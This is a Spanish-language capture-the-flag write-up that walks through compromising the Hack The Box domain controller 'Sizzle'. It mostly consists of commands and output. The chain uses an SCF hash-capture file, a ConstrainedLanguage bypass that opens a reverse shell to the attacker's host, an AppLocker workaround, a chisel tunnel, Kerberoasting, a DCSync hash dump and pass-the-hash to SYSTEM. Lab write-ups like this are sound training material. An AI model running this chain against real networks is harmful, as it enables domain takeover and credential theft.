Enumeración
Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos varios puertos abiertos, entre ellos el 80 que corre un servicio http
❯ nmap 10.10.10.103
Nmap scan report for 10.10.10.103
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49692/tcp open unknown
49695/tcp open unknown
49700/tcp open unknown
49713/tcp open unknown
Con crackmapexec podemos obtener información de la maquina asi como el dominio que es htb.local ademas del nombre de la maquina que es SIZZLE
❯ crackmapexec smb 10.10.10.103
SMB 10.10.10.103 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
Para posibles proximos ataques o solo por comodidad agregaremos el dominio al /etc/hosts ademas el nombre de la máquina que es SIZZLE como otro dominio
❯ echo "10.10.10.103 htb.local sizzle.htb.local" | sudo tee -a /etc/hosts
El servicio ftp se encuentra abierto y acepta una autenticacion por defecto como el usuario anonymous, sin embargo no encontramos nada interesante en este
❯ ftp htb.local
Connected to htb.local.
220 Microsoft FTP Service
Name (htb.local:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||54665|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
La página web principal tampoco nos aporta nada, solo es un gif sin mucho sentido
Enumerando recursos smb compartidos desde una sesion nula tenemos privilegios READ o de lectura en el recurso Department Shares que no viene por defecto
❯ crackmapexec smb htb.local -u null -p '' --shares
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\null:
SMB htb.local 445 SIZZLE [+] Enumerated shares
SMB htb.local 445 SIZZLE Share Permissions Remark
SMB htb.local 445 SIZZLE ----- ----------- ------
SMB htb.local 445 SIZZLE ADMIN$ Remote Admin
SMB htb.local 445 SIZZLE C$ Default share
SMB htb.local 445 SIZZLE CertEnroll Active Directory Certificate Services share
SMB htb.local 445 SIZZLE Department Shares READ
SMB htb.local 445 SIZZLE IPC$ READ Remote IPC
SMB htb.local 445 SIZZLE NETLOGON Logon server share
SMB htb.local 445 SIZZLE Operations
SMB htb.local 445 SIZZLE SYSVOL Logon server share
Podemos conectarnos con smbclient y dentro encontramos varios directorios
❯ impacket-smbclient htb.local/null@sizzle.htb.local -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use Department Shares
# ls
drw-rw-rw- 0 Tue Jul 3 10:22:32 2018 .
drw-rw-rw- 0 Tue Jul 3 10:22:32 2018 ..
drw-rw-rw- 0 Mon Jul 2 14:21:43 2018 Accounting
drw-rw-rw- 0 Mon Jul 2 14:14:28 2018 Audit
drw-rw-rw- 0 Tue Jul 3 10:22:39 2018 Banking
drw-rw-rw- 0 Mon Jul 2 14:15:01 2018 CEO_protected
drw-rw-rw- 0 Mon Jul 2 14:22:06 2018 Devops
drw-rw-rw- 0 Mon Jul 2 14:11:57 2018 Finance
drw-rw-rw- 0 Mon Jul 2 14:16:11 2018 HR
drw-rw-rw- 0 Mon Jul 2 14:14:24 2018 Infosec
drw-rw-rw- 0 Mon Jul 2 14:13:59 2018 Infrastructure
drw-rw-rw- 0 Mon Jul 2 14:12:04 2018 IT
drw-rw-rw- 0 Mon Jul 2 14:12:09 2018 Legal
drw-rw-rw- 0 Mon Jul 2 14:15:25 2018 M&A
drw-rw-rw- 0 Mon Jul 2 14:14:43 2018 Marketing
drw-rw-rw- 0 Mon Jul 2 14:11:47 2018 R&D
drw-rw-rw- 0 Mon Jul 2 14:14:37 2018 Sales
drw-rw-rw- 0 Mon Jul 2 14:21:46 2018 Security
drw-rw-rw- 0 Mon Jul 2 14:16:54 2018 Tax
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 Users
drw-rw-rw- 0 Mon Jul 2 14:32:58 2018 ZZ_ARCHIVE
#
Dentro del directorio ZZ_ARCHIVE encontramos muchos archivos de diferentes extensiones, podemos descargar todos usando mget para despues analizarlos
# cd ZZ_ARCHIVE
# mget *
[*] Downloading AddComplete.pptx
[*] Downloading AddMerge.ram
[*] Downloading ConfirmUnprotect.doc
[*] Downloading ConvertFromInvoke.mov
[*] Downloading ConvertJoin.docx
[*] Downloading CopyPublish.ogg
[*] Downloading DebugMove.mpg
[*] Downloading DebugSelect.mpg
[*] Downloading DebugUse.pptx
[*] Downloading DisconnectApprove.ogg
[*] Downloading DisconnectDebug.mpeg2
[*] Downloading EditCompress.xls
.....................................
[*] Downloading ResumeCompare.doc
[*] Downloading SelectPop.ogg
[*] Downloading SuspendWatch.mp4
[*] Downloading SwitchConvertFrom.mpg
[*] Downloading UndoPing.rm
[*] Downloading UninstallExpand.mp3
[*] Downloading UnpublishSplit.ppt
[*] Downloading UnregisterPing.pptx
[*] Downloading UpdateRead.mpeg
[*] Downloading WaitRevoke.pptx
[*] Downloading WriteUninstall.mp3
#
Realmente no nos aportan nada, si revisamos un archivo todos los bytes son 00 y el hash md5 de todos los archivos es el mismo, asi que solo son null bytes
❯ xxd WriteUninstall.mp3 | head -n1
00000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................
❯ md5sum *
6fa74ff6dd88878b4b56092a950035f8 AddComplete.pptx
6fa74ff6dd88878b4b56092a950035f8 AddMerge.ram
6fa74ff6dd88878b4b56092a950035f8 ConfirmUnprotect.doc
6fa74ff6dd88878b4b56092a950035f8 ConvertFromInvoke.mov
6fa74ff6dd88878b4b56092a950035f8 ConvertJoin.docx
6fa74ff6dd88878b4b56092a950035f8 CopyPublish.ogg
6fa74ff6dd88878b4b56092a950035f8 DebugMove.mpg
6fa74ff6dd88878b4b56092a950035f8 DebugSelect.mpg
6fa74ff6dd88878b4b56092a950035f8 DebugUse.pptx
6fa74ff6dd88878b4b56092a950035f8 DisconnectApprove.ogg
6fa74ff6dd88878b4b56092a950035f8 DisconnectDebug.mpeg2
6fa74ff6dd88878b4b56092a950035f8 EditCompress.xls
.......................................................
Access - amanda
En el directorio Users encontramos a diferentes usuarios probablemente del sistema
# cd Users
# ls
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 .
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 ..
drw-rw-rw- 0 Mon Jul 2 14:18:43 2018 amanda
drw-rw-rw- 0 Mon Jul 2 14:19:06 2018 amanda_adm
drw-rw-rw- 0 Mon Jul 2 14:18:28 2018 bill
drw-rw-rw- 0 Mon Jul 2 14:18:31 2018 bob
drw-rw-rw- 0 Mon Jul 2 14:19:14 2018 chris
drw-rw-rw- 0 Mon Jul 2 14:18:39 2018 henry
drw-rw-rw- 0 Mon Jul 2 14:18:34 2018 joe
drw-rw-rw- 0 Mon Jul 2 14:18:53 2018 jose
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 lkys37en
drw-rw-rw- 0 Mon Jul 2 14:18:48 2018 morgan
drw-rw-rw- 0 Mon Jul 2 14:19:20 2018 mrb3n
drw-rw-rw- 0 Wed Sep 26 00:45:32 2018 Public
#
Con smbcacls podemos ver los privilegios exactos que tenemos sobre cada carpeta del recurso compartido, especificamente nos interesa el campo Everyone ya que son los privilegios que tenemos desde la null session en el contexto en que estamos
❯ smbcacls -N "//hackthebox.local/Department Shares" "Users/amanda"
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
A traves de un bucle iterando por cada uno de los directorios de usuario podemos revisar los privilegios de Everyone, en la carpeta Public tenemos privilegio FULL
❯ for user in $(cat users.txt); do echo -n "Users/$user: "; smbcacls -N "//hackthebox.local/Department Shares" "Users/$user" | grep Everyone; done
Users/amanda: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/amanda_adm: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/bill: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/bob: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/chris: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/henry: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/joe: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/jose: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/lkys37en: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/morgan: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/mrb3n: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/Public: ACL:Everyone:ALLOWED/OI|CI/FULL
Un posible ataque como en Driver es cargar un archivo scf para cuando un usuario intente ver el icono este se carge de un recurso smb externo que crearemos
[Shell]
IconFile=\\10.10.14.10\kali\pwned.ico
Simplemente nos conectamos con smbclient subimos el scf al directorio Public
❯ impacket-smbclient htb.local/null@sizzle.htb.local -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use Department Shares
# cd Users\Public
# put file.scf
#
Despues de unos segundos recibimos un hash NTLMv2 perteneciente a amanda
❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,53037)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:cdc61f6dec08fc4c6b29cbd23c0ef801:0101000000000000808f118b18d3d9011528d60c45e443e000000000010010004d006b006b0063004700490041007400030010004d006b006b00630047004900410074000200100043005900660063006200710079004200040010004300590066006300620071007900420007000800808f118b18d3d9010600040002000000080030003000000000000000010000000020000044545fcb6ad84fa298ce8e914d1f888b0021bae9cdd79032f9f3221b5963c43d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:kali)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:kali)
[*] Closing down connection (10.10.10.103,53037)
[*] Remaining connections []
La contraseña es debil por lo tanto podemos crackearla facilmente usando john
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Comprobamos la contraseña del usuario amanda en SMB usando crackmapexec y nos devuelve que es valida, ahora tenemos credenciales a nivel de dominio
❯ crackmapexec smb htb.local -u amanda -p Ashare1972
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
Shell - amanda
Al intentar autenticarnos a winrm nos devuelve un error, pero no es de autenticacion sino de problemas del servidor que no responde en NTLM ni por Kerberos
❯ crackmapexec winrm htb.local -u amanda -p Ashare1972
SMB htb.local 5986 SIZZLE [*] Windows 10.0 Build 14393 (name:SIZZLE) (domain:HTB.LOCAL)
HTTP htb.local 5986 SIZZLE [*] https://hackthebox.local:5986/wsman
WINRM htb.local 5986 SIZZLE [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"
Lo que podemos hacer es autenticarnos con un certificado y una clave, para ello iniciamos obteniendo un pfx con certipy pero antes necesitamos conocer el CA
❯ certipy find -target htb.local -u amanda -p Ashare1972
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'HTB-SIZZLE-CA' via CSRA
[*] Trying to get CA configuration for 'HTB-SIZZLE-CA' via RRP
[*] Got CA configuration for 'HTB-SIZZLE-CA'
[-] Got error: module 'enum' has no attribute '_decompose'
[-] Use -debug to print a stacktrace
Ya con el CA obtenemos el pfx como amanda y extraemos de este el crt y el key
❯ certipy req -target htb.local -u amanda -p Ashare1972 -ca HTB-SIZZLE-CA
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 23
[*] Got certificate with UPN 'amanda@HTB.LOCAL'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'amanda.pfx'
❯ certipy cert -pfx amanda.pfx -nokey -out amanda.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'amanda.crt'
❯ certipy cert -pfx amanda.pfx -nocert -out amanda.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'amanda.key'
Con el .crt y el .key que generamos con certipy para el usuario amanda podemos conectarnos con evil-winrm por SSL y obtener una powershell como amanda
❯ evil-winrm -S -i htb.local -c amanda.crt -k amanda.key
PS C:\Users\amanda\Documents> whoami
htb\amanda
PS C:\Users\amanda\Documents>
Shell - mrlky
Si intentamos importar el modulo de SharpHound usando Import-Module nos salta un error diciendo que no podemos importar scripts en este contexto de modo
PS C:\Users\amanda\Documents> curl 10.10.14.10/SharpHound.ps1 -o SharpHound.ps1
PS C:\Users\amanda\Documents> Import-Module .\SharpHound.ps1
Importing *.ps1 files as modules is not allowed in ConstrainedLanguage mode.
At line:1 char:1
+ Import-Module .\SharpHound.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [Import-Module], InvalidOperationException
+ FullyQualifiedErrorId : Modules_ImportPSFileNotAllowedInConstrainedLanguage,Microsoft.PowerShell.Commands.ImportModuleCommand
PS C:\Users\amanda\Documents>
Esto se debe a nuestro contexto de ejecucion ya que el modo de lenguaje es ConstrainedLenguage lo que significa que estamos restringidos en varios aspectos
PS C:\Users\amanda\Documents> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
PS C:\Users\amanda\Documents>
Para bypassear esto podemos usar PSByPassCLM que tiene una funcion para entablar una reverse shell pero con una powershell sin el ConstrainedLenguage
PS C:\Users\amanda\Documents> curl 10.10.14.10/PsBypassCLM.exe -o PsBypassCLM.exe
PS C:\Users\amanda\Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U /revshell=true /rhost=10.10.14.10 /rport=443 C:\Users\amanda\Documents\PsBypassCLM.exe
Microsoft (R) .NET Framework Installation utility Version 4.6.1586.0
Copyright (C) Microsoft Corporation. All rights reserved.
The uninstall is beginning.
See the contents of the log file for the C:\Users\amanda\Documents\PsBypassCLM.exe assembly's progress.
The file is located at .
Uninstalling assembly 'C:\Users\amanda\Documents\PsBypassCLM.exe'.
Affected parameters are:
assemblypath = C:\Users\amanda\Documents\PsBypassCLM.exe
rport = 443
revshell = true
rhost = 10.10.14.10
logtoconsole = true
logfile =
Trying to connect back...
PS C:\Users\amanda\Documents>
Después de ejecutarlo recibimos una powershell en nuestro listener aun como el usuario amanda pero esta vez sin la limitacion ya que tenemos un FullLanguage
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.103
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\amanda\Documents> whoami
htb\amanda
PS C:\Users\amanda\Documents> $ExecutionContext.SessionState.LanguageMode
FullLanguage
PS C:\Users\amanda\Documents>
Ahora podemos importar el modulo de SharpHound para despues invocarlo y que nos recolecte informacion sobre el dominio, esto guardara la informacion en un zip
PS C:\Users\amanda\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\amanda\Documents> Invoke-BloodHound -CollectionMethod All
PS C:\Users\amanda\Documents> dir
Directory: C:\Users\amanda\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/20/2023 1:18 AM 12276 20230820011815_BloodHound.zip
-a---- 8/20/2023 1:18 AM 1391869 SharpHound.ps1
PS C:\Users\amanda\Documents>
Despues de subir el zip a bloodhound tenemos diferentes querys que podemos utilizar, al listar los usuarios kerberoasteables podemos encontrar a mrlky
Tenemos otra limitación y es que aunque el puerto de kerberos que es el 88 esta abierto no podemos verlo desde el exterior y lo necesitamos para poder avanzar
PS C:\Users\amanda\Documents> netstat -oat
Active Connections
Proto Local Address Foreign Address State PID Offload State
TCP 0.0.0.0:21 sizzle:0 LISTENING 2452 InHost
TCP 0.0.0.0:80 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:88 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:135 sizzle:0 LISTENING 856 InHost
TCP 0.0.0.0:389 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:443 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:445 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:464 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:593 sizzle:0 LISTENING 856 InHost
TCP 0.0.0.0:636 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:3268 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:3269 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:5985 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:5986 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:9389 sizzle:0 LISTENING 2412 InHost
.............................................................................................
PS C:\Users\amanda\Documents>
Podemos pensar en crear un tunel socks5 con chisel pero al intentar ejecutarlo tenemos otra limitacion y es que por politicas no podemos ejecutar archivos exe
PS C:\Users\amanda\Documents> curl 10.10.14.10/chisel.exe -o chisel.exe
PS C:\Users\amanda\Documents> .\chisel.exe client 10.10.14.10:9999 R:socks
Program 'chisel.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .\chisel.exe client 10.10.14.10:9999 R:socks
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\chisel.exe client 10.10.14.10:9999 R:socks
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
PS C:\Users\amanda\Documents>
Revisando las politicas podemos ver una regla que dice que todos los ejecutables creados a partir de C:\Windows pueden ser ejecutados por cualquier usuario
PS C:\Users\amanda\Documents> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
PublisherConditions : {*\*\*,0.0.0.0-*}
PublisherExceptions : {}
PathExceptions : {}
HashExceptions : {}
Id : a9e18c21-ff8f-43cf-b9fc-db40eed693ba
Name : (Default Rule) All signed packaged apps
Description : Allows members of the Everyone group to run packaged apps that are signed.
UserOrGroupSid : S-1-1-0
Action : Allow
PathConditions : {%WINDIR%\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : a61c8b2c-a319-4cd0-9690-d2177cad7b51
Name : (Default Rule) All files located in the Windows folder
Description : Allows members of the Everyone group to run applications that are located in the Windows folder.
UserOrGroupSid : S-1-1-0
Action : Allow
PathConditions : {%OSDRIVE%\tmp\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name : All files located in the Program Files folder
Description : Allows members of the Everyone group to run applications that are located in the Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow
PS C:\Users\amanda\Documents>
Podemos simplemente descargar nuevamente chisel.exe en C:\Windows\Temp y como con ello cumplimos la regla lo podemos ejecutar para crear el tunel socks5
PS C:\Windows\Temp> curl 10.10.14.10/chisel.exe -o chisel.exe
PS C:\Windows\Temp> .\chisel.exe client 10.10.14.10:9999 R:socks
❯ chisel server --reverse --port 9999
server: Reverse tunnelling enabled
server: Listening on http://0.0.0.0:9999
server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Pasando por el tunel con proxychains podemos explotar usar GetUserSPNs para aprovechandonos de lo que vimos en bloodhound obtener el hash de mrlky
❯ proxychains -q impacket-GetUserSPNs htb.local/amanda:Ashare1972 -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ----- ----------------------------------------------------- -------------------------- -------------------------- ----------
http/sizzle mrlky CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL 2018-07-10 13:08:09.536421 2018-07-12 09:23:50.871575
$krb5tgs$23$*mrlky$HTB.LOCAL$htb.local/mrlky*$2eedace6780d18a7ccb1f15d82d1a2af$ea65e4d6c9b52ab78ded932c6bb7a3c10f7144a7d4fa6f9f02de581122b59435d8b62c5909ae032d4de96c70362b228bdd89a6b02ef32e1a47678ad78b20df3a263b306d78eebf92140d2c9db0f6c3973c1f6918ee31bb9d01960a85fb8e7728da4af994c67befac1827ab58a53188a30ef1a3304f9d03afbda6a2ad27bccebf143b7a467efcf46eec9cfdb6b6a44d1c9506af2db5dd1b4703c65f6c9c395773c6a3a62d478708a44271d4194537081057f58c8fe09abf0d572fec46537076d88637d39a19a992da3f96a066709d49370e1e33d102b4552d784781c69406221f54366fd6a24833b03b11a1813a37c66cd1f452bf17af38004cd9b5b7dd2def7ad3bac974a1a5cc98a8677a5ae25e3afbafab45acda0972051d421961fef484f6697f333937e8e01358261dcaaf5f2ad6e9cc08b6a458683bed1711fe9efc155c3fa91a843842a3625cbcbbb54e34374cdbf542fb019b99fcc97935d4d70d72d7337d62abd90cca2897d04e2065e33ff7ab9e2c1d6818f439d0293722bc9380a8ca8972d64dc8604e433a1b96538b7f5c808d6b9d89770d500b29d3a8b23f1a5dfc673e46d689972321e40455eadb5a7f3142afc736570a3047ef77c48c4b1d3212f1961a6ff53f2e2008c257f22b886642ed9e259fdf6bd407af210daba5d469c62260071f00f690bcefda75e895cf6d1426501213075887ee90976c01f4ac95e9b1718c3df0f1ebe1a97d795f72919fbb2dbc96db9cafac61aa02c81068f80ddf8fd00cbb0925fdba0b3f396fa5c8f4e8f30f3b803e9a8af3e6b17fa7fbf9ec82f60f14179653315f4ce112e529de0e1972d492f943893b43a9f4e4ebdd2defef0b1ff68f0f335162cd35dfff0eb435ff5d47ba6153361a9c8b296e1d26c35a154c4069b1aa07816b148833d021e3251618d95d780dfbc2d8552887da73a85d01509ecdd784353a0d459ee5bf484a4760d085a01d36dab32f532f3676981f5146fb4411f7d930fcfd40d3bca03d468a500727b748555a016fd1d9894f215e5e4edfaa21bb0c3d2d9c46bc76b45e40d9dca35cd7f1e0246b59b1035483d22a3bfd73a8854f51c832253408122e5825469c27b5634adfac127181d380ed59be07fa98806f0678687e06e2027a4019b8bc2fa1f322206013637db99e7d89a3f4878fe90819200c47b5ccee9b1b1ee7c3b3e88bb6ba381d8ae53a7812a66dd0b26e2f519f6af790ae09ea517f307fcec955530c0c687b240565
El hash que conseguimos es bastante debil y lo crackeamos facilmente usando john
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Comprobamos la contraseña con crackmapexec y nos devuelve que esta es valida
❯ crackmapexec smb htb.local -u mrlky -p Football#7
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
Volvemos hacer el proceso de crear el certificado con certipy esta vez con las credenciales de mrlky y con el nuevo crt y la key nos conectamos a winrm
❯ certipy req -target htb.local -u mrlky -p Football#7 -ca HTB-SIZZLE-CA
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 23
[*] Got certificate with UPN 'mrlky@HTB.LOCAL'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'mrlky.pfx'
❯ certipy cert -pfx mrlky.pfx -nokey -out mrlky.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'mrlky.crt'
❯ certipy cert -pfx mrlky.pfx -nocert -out mrlky.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'mrlky.key'
❯ evil-winrm -S -i htb.local -c mrlky.crt -k mrlky.key
PS C:\Users\mrlky\Documents> whoami
htb\amanda
PS C:\Users\mrlky\Documents> type ..\Desktop\user.txt
454**************************593
PS C:\Users\mrlky\Documents>
Shell - Administrator
Volviendo a bloodhound encontramos que el usuario mrlky tiene privilegios DCSync sobre el dominio por lo que podemos dumpear los hashes del ntds.dit
Para explotarlo podemos hacerlo facilmente usando crackmapexec usando --ntds y con drsuapi como metodo, asi obtenemos todos los hashes NT del dominio
❯ crackmapexec smb htb.local -u mrlky -p Football#7 --ntds drsuapi
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
SMB htb.local 445 SIZZLE [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB htb.local 445 SIZZLE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB htb.local 445 SIZZLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
SMB htb.local 445 SIZZLE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB htb.local 445 SIZZLE krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
SMB htb.local 445 SIZZLE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB htb.local 445 SIZZLE amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
SMB htb.local 445 SIZZLE mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
SMB htb.local 445 SIZZLE sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SMB htb.local 445 SIZZLE SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:73d400aa1750745557a5785eac8301a0:::
Ya con el hash NT del usuario Administrator haciendo un passthehash podemos autenticarnos con psexec y obtener una shell como nt authority\system
❯ impacket-psexec htb.local/Administrator@sizzle.htb.local -hashes :f6b7160bfc91823792e0ac3a162c9267
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on sizzle.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file PZQqHJdn.exe
[*] Opening SVCManager on sizzle.htb.local.....
[*] Creating service NaUn on sizzle.htb.local.....
[*] Starting service NaUn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
3b7**************************bd7
C:\Windows\system32>
